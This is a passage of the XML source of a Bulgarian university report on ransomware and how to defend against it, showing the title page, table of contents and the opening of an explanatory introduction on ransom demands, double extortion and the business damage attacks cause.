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9C51" w14:textId="745DE9CA" w:rsidR="0002452F" w:rsidRPr="00C40453" w:rsidRDefault="002020B8" w:rsidP="002020B8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto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9563B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="07A7AEAA" wp14:editId="6B5F4D5B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>5365115</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-151130</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1005753" cy="641350"/>
            <wp:effectExtent l="0" t="0" r="4445" b="6350"/>
            <wp:wrapNone/>
            <wp:docPr id="579471419" name="Picture 1" descr="Acade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adem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753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63B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hidden="0" allowOverlap="1" wp14:anchorId="3EE879DA" wp14:editId="4FBD861B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-407035</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-169545</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="752475" cy="755015"/>
            <wp:effectExtent l="0" t="0" r="9525" b="6985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5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0453">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:smallCaps/>
          <w:spacing w:val="-4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Технически  Университет – София</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D57842E" w14:textId="77777777" w:rsidR="0002452F" w:rsidRPr="00C40453" w:rsidRDefault="0002452F" w:rsidP="0002452F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/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1768763" w14:textId="77777777" w:rsidR="0002452F" w:rsidRPr="00C40453" w:rsidRDefault="0002452F" w:rsidP="0002452F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40453">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ФАКУЛТЕТ ПО КОМПЮТЪРНИ СИСТЕМИ И ТЕХНОЛОГИИ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B34E762" w14:textId="77777777" w:rsidR="0002452F" w:rsidRPr="00C40453" w:rsidRDefault="0002452F" w:rsidP="0002452F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40453">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>КОМПЮТЪРНО И СОФТУЕРНО ИНЖЕНЕРСТВО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679D95B5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3852B61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46DDEDEC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4AFD4DBA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29BADFC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96E9F72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03E7BED8" w14:textId="04B6C027" w:rsidR="0002452F" w:rsidRPr="00795EDA" w:rsidRDefault="002020B8" w:rsidP="0002452F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00795EDA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Какво представлява ransomware? Стратегии и защита от ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C91238E" w14:textId="74301248" w:rsidR="0002452F" w:rsidRPr="002020B8" w:rsidRDefault="00514517" w:rsidP="0002452F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto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>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Реферат</w:t>
      </w:r>
      <w:r w:rsidR="002020B8" w:rsidRPr="002020B8">
        <w:rPr>
          <w:rFonts w:eastAsia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r w:rsidR="002020B8" w:rsidRPr="002020B8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>по</w:t>
      </w:r>
      <w:r w:rsidR="0002452F" w:rsidRPr="002020B8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2E9E2346" w14:textId="6FD56D46" w:rsidR="002020B8" w:rsidRPr="002020B8" w:rsidRDefault="002020B8" w:rsidP="002020B8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto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2020B8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>„Програмни технологии за сигурен код“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170DFC8B" w14:textId="7A71D9F4" w:rsidR="0002452F" w:rsidRPr="002020B8" w:rsidRDefault="0002452F" w:rsidP="0002452F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E9E2103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36532A0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C54095B" w14:textId="77777777" w:rsidR="0002452F" w:rsidRPr="00C40453" w:rsidRDefault="0002452F" w:rsidP="0002452F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E1EC851" w14:textId="77777777" w:rsidR="0002452F" w:rsidRPr="002020B8" w:rsidRDefault="0002452F" w:rsidP="0002452F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DF7C661" w14:textId="77777777" w:rsidR="0002452F" w:rsidRPr="00C40453" w:rsidRDefault="0002452F" w:rsidP="0002452F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40453">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Съставил: Ангел Любомиров Стойнов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25827A4A" w14:textId="77777777" w:rsidR="0002452F" w:rsidRPr="00C40453" w:rsidRDefault="0002452F" w:rsidP="0002452F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40453">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Факултетен номер: 121222150</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4380BBF2" w14:textId="58834C1F" w:rsidR="0002452F" w:rsidRPr="009E432F" w:rsidRDefault="0002452F" w:rsidP="009E432F">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40453">
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Група: 40</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:eastAsia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id w:val="-537783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963F16" w14:textId="4C29E5EB" w:rsidR="00EA2C3E" w:rsidRDefault="00EA2C3E">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Съдържание</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="615F11DB" w14:textId="1D43E84C" w:rsidR="00EB3361" w:rsidRDefault="00EA2C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4926" w:history="1">
            <w:r w:rsidR="00EB3361" w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsia="Aptos"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Въведение</w:t>
            </w:r>
            <w:r w:rsidR="00EB3361">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00EB3361">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00EB3361">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc224154926 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00EB3361">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00EB3361"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3</w:t>
            </w:r>
            <w:r w:rsidR="00EB3361">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="173CDF25" w14:textId="201704D7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27" w:history="1">
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">История на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4717" w14:textId="50EC8DD8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28" w:history="1">
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Еволюция на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8FD1F" w14:textId="12AF499B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29" w:history="1">
            <w:r w:rsidRPr="00725D8C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</w:rPr>
              <w:t xml:space="preserve">Ранна фаза на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357D8" w14:textId="5924AC98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0" w:history="1">
            <w:r w:rsidRPr="00725D8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 w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> използващ </w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RSA</w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> криптиране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DBB2F" w14:textId="2748A7A1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1" w:history="1">
            <w:r w:rsidRPr="00725D8C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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Spear phishing 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B903" w14:textId="06D831C3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2" w:history="1">
            <w:r w:rsidRPr="00725D8C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 w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> в </w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Android </w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>базирани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0981B" w14:textId="3F918FB7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3" w:history="1">
            <w:r w:rsidRPr="00725D8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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Big Game Hunting (BGH) </w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">и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832ED" w14:textId="04680B8D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4" w:history="1">
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ransomware</w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> в България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9640" w14:textId="762F51E7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5" w:history="1">
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Ролята на </w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">AI </w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">в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 w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> атаките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DB4E" w14:textId="369A2C70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6" w:history="1">
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Имплементация на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0392B" w14:textId="61BE4419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7" w:history="1">
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Демонстрация на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E0DF3" w14:textId="5E413326" w:rsidR="00EB3361" w:rsidRDefault="00EB336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8" w:history="1">
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Съдържание на текстовите файлове преди криптирането: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9E943" w14:textId="63DA6469" w:rsidR="00EB3361" w:rsidRDefault="00EB336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39" w:history="1">
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Стартиране на демото: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7BD7" w14:textId="75072BCA" w:rsidR="00EB3361" w:rsidRDefault="00EB336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0" w:history="1">
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Потърпевшият е заплатил откупа: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D268" w14:textId="25292651" w:rsidR="00EB3361" w:rsidRDefault="00EB336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1" w:history="1">
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QR code</w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> към имплементацията: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99773" w14:textId="0F3B76B8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2" w:history="1">
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Стратегии и защита от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1569" w14:textId="5745A279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3" w:history="1">
            <w:r w:rsidRPr="00725D8C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</w:rPr>
              <w:t xml:space="preserve">Подготовка за </w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ransomware</w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> инциденти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0FB9" w14:textId="59B2D344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4" w:history="1">
            <w:r w:rsidRPr="00725D8C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</w:rPr>
              <w:t>Превенция на интернет-достъпни уязвимости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F6FC" w14:textId="3E47B1E0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5" w:history="1">
            <w:r w:rsidRPr="00725D8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</w:rPr>
              <w:t>Компрометирани пароли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0608" w14:textId="414C6D58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6" w:history="1">
            <w:r w:rsidRPr="00725D8C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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Phishing </w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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0446" w14:textId="53CE03C0" w:rsidR="00EB3361" w:rsidRDefault="00EB3361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7" w:history="1">
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"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bg-BG"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">Други форми на </w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Social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C114" w14:textId="4CB0640A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8" w:history="1">
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Какво да направим, ако станем жертва на</w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ransomware</w:t>
            </w:r>
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve"> атака?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4F953" w14:textId="1D118A4E" w:rsidR="00EB3361" w:rsidRDefault="00EB3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24154949" w:history="1">
            <w:r w:rsidRPr="00725D8C">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Цитирани източници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4D8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904F" w14:textId="053DD5EC" w:rsidR="00437A39" w:rsidRPr="00437A39" w:rsidRDefault="00EA2C3E" w:rsidP="002020B8">
          <w:pPr>
            <w:rPr>
              <w:bCs/>
            </w:rPr>
            <w:sectPr w:rsidR="00437A39" w:rsidRPr="00437A39" w:rsidSect="002020B8">
              <w:headerReference w:type="default" r:id="rId13"/>
              <w:footerReference w:type="default" r:id="rId14"/>
              <w:pgSz w:w="11906" w:h="16838"/>
              <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="709" w:footer="709" w:gutter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745600DD" w14:textId="3C3558E7" w:rsidR="00822711" w:rsidRDefault="0002452F" w:rsidP="0002452F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc224154926"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Aptos"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Въведение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="53E8379A" w14:textId="133D3D18" w:rsidR="004E706C" w:rsidRDefault="0002452F" w:rsidP="00051862">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00234B9C" w:rsidRPr="00234B9C">
        <w:t>Рансъмуерът</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00234B9C" w:rsidRPr="00234B9C">
        <w:t xml:space="preserve"> е вид зловреден софтуер, който представлява финалната фаза на една по-сложна кибератака – той криптира файлове и ограничава достъпа до дадена система, след като нападателят вече е проникнал в нея</w:t>
      </w:r>
      <w:r w:rsidR="003D6CE8">
        <w:t>. Хакерът изисква откуп от</w:t>
      </w:r>
      <w:r w:rsidR="00464C04">
        <w:t xml:space="preserve"> потърпевшия</w:t>
      </w:r>
      <w:r w:rsidR="003D6CE8">
        <w:t xml:space="preserve">, обикновено парична сума (в биткойн), в замяна </w:t>
      </w:r>
      <w:r w:rsidR="00C70CE2">
        <w:t>ощетения</w:t>
      </w:r>
      <w:r w:rsidR="00116D33">
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidR="00C70CE2">
        <w:t xml:space="preserve"> си възвръща </w:t>
      </w:r>
      <w:r w:rsidR="003D6CE8">
        <w:t xml:space="preserve">откраднатите данни. </w:t>
      </w:r>
      <w:r w:rsidR="004D6012">
        <w:t xml:space="preserve">Най-често се използва биткойн или друга криптовалута, </w:t>
      </w:r>
      <w:r w:rsidR="002F5406">
        <w:t xml:space="preserve">тъй като </w:t>
      </w:r>
      <w:r w:rsidR="004D6012">
        <w:t>е трудн</w:t>
      </w:r>
      <w:r w:rsidR="00147363">
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidR="004D6012">
        <w:t xml:space="preserve"> да бъде проследена. </w:t>
      </w:r>
      <w:r w:rsidR="003D6CE8">
        <w:t>Ако жертвата откаже да заплати, всички файлове ще бъдат унищожени.</w:t>
      </w:r>
      <w:r w:rsidR="004E706C">
        <w:t xml:space="preserve"> Дори потребителят да заплати сумата не е сигурно, че хакерът няма да </w:t>
      </w:r>
      <w:r w:rsidR="002F5406">
        <w:t xml:space="preserve">ги </w:t>
      </w:r>
      <w:r w:rsidR="004E706C">
        <w:t>изтрие</w:t>
      </w:r>
      <w:r w:rsidR="004717D9">
        <w:t xml:space="preserve"> или да поиска повторно откуп</w:t>
      </w:r>
      <w:r w:rsidR="004E706C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003D6CE8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28276442" w14:textId="77777777" w:rsidR="00ED2A4F" w:rsidRDefault="003D6CE8" w:rsidP="00051862">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>В зависимост от открадната информация,</w:t>
      </w:r>
      <w:r w:rsidR="00ED2A4F">
        <w:t xml:space="preserve"> потърпевшият</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> може да бъде заплаш</w:t>
      </w:r>
      <w:r w:rsidR="00ED2A4F">
        <w:t>е</w:t>
      </w:r>
      <w:r>
        <w:t>н, че лична</w:t>
      </w:r>
      <w:r w:rsidR="00ED2A4F">
        <w:t>та му</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> информация ще бъде разпространена в интернет – местожителство, членове на семейство, </w:t>
      </w:r>
      <w:r w:rsidR="004D6012">
        <w:t>банкова информация, документи, фирмена информация, работно място</w:t>
      </w:r>
      <w:r w:rsidR="000F15C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F15C2">
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="00ED2A4F">
        <w:t>т.н</w:t>
      </w:r>
      <w:r w:rsidR="004D6012">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECA8551" w14:textId="636A3461" w:rsidR="00ED2A4F" w:rsidRDefault="00FE0F4D" w:rsidP="00051862">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Паричен о</w:t>
      </w:r>
      <w:r w:rsidR="00ED2A4F">
        <w:t>ткуп, комбиниран с злоупотреба с лични данни се нарича</w:t>
      </w:r>
      <w:r w:rsidR="004E706C">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="004D6012">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000779C9">
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidR="004D6012">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">double extortion”. </w:t>
      </w:r>
      <w:r w:rsidR="004D6012">
        <w:t xml:space="preserve">Колкото е по-силен мотивът, толкова е по-вероятно потърпевшият да се пречупи. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E11D8A2" w14:textId="61B72302" w:rsidR="0002452F" w:rsidRDefault="004D6012" w:rsidP="00ED2A4F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Друга тактика, която често се прилага е блъф</w:t>
      </w:r>
      <w:r w:rsidR="00ED2A4F">
        <w:t>иране. Киберпрестъпникът</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> има частичен достъп до дадена система, но е неспособен да й навреди. Тогава </w:t>
      </w:r>
      <w:r w:rsidR="00ED2A4F">
        <w:t>отправя</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> безпочвени закани и разчита потребителя</w:t>
      </w:r>
      <w:r w:rsidR="00ED2A4F">
        <w:t>т</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> да изпълни </w:t>
      </w:r>
      <w:r w:rsidR="00216C71">
        <w:t>указанията</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501A8E3F" w14:textId="090662D0" w:rsidR="00A46E29" w:rsidRDefault="00BB2B78" w:rsidP="00051862">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004648AB">
        <w:t xml:space="preserve"> Тези атаки с изнудващ зловреден софтуер (ransomware) могат сериозно да нарушат бизнес процесите. </w:t>
      </w:r>
      <w:r w:rsidR="00770E2D">
        <w:t>Компаниите</w:t>
      </w:r>
      <w:r w:rsidR="004648AB">
        <w:t xml:space="preserve"> губят достъп до важна информация, необходима за нормалн</w:t>
      </w:r>
      <w:r w:rsidR="00770E2D">
        <w:t xml:space="preserve">ия работен процес и </w:t>
      </w:r>
      <w:r w:rsidR="004648AB">
        <w:t>предоставяне на к</w:t>
      </w:r>
      <w:r w:rsidR="00770E2D">
        <w:t xml:space="preserve">онкретни </w:t>
      </w:r>
      <w:r w:rsidR="004648AB">
        <w:t>услуги.</w:t>
      </w:r>
      <w:r w:rsidR="00A46E29">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004648AB">
        <w:t>Икономическите  щети</w:t>
      </w:r>
      <w:r w:rsidR="00770E2D">
        <w:t xml:space="preserve"> за фирмите</w:t>
      </w:r>
      <w:r w:rsidR="00F66B70">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004648AB">
        <w:t>са значи</w:t>
      </w:r>
      <w:r w:rsidR="00770E2D">
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidR="004648AB">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00770E2D">
        <w:t>, а в</w:t>
      </w:r>
      <w:r w:rsidR="004648AB">
        <w:t xml:space="preserve">ъзстановяването </w:t>
      </w:r>
      <w:r w:rsidR="00770E2D">
        <w:t xml:space="preserve">на репутацията </w:t>
      </w:r>
      <w:r w:rsidR="004648AB">
        <w:t xml:space="preserve">след подобна атака е трудно и скъпо. Засегнати могат да бъдат организации от всякакъв мащаб. </w:t>
      </w:r>
      <w:r w:rsidR="00234B9C" w:rsidRPr="00234B9C">
        <w:t>Щетите от ransomware атака рядко приключват с възстановяването на системите – последиците могат да се усещат дълго след това.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC3CD98" w14:textId="35DEEB09" w:rsidR="004E706C" w:rsidRDefault="00770E2D" w:rsidP="0047015F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>К</w:t>
      </w:r>
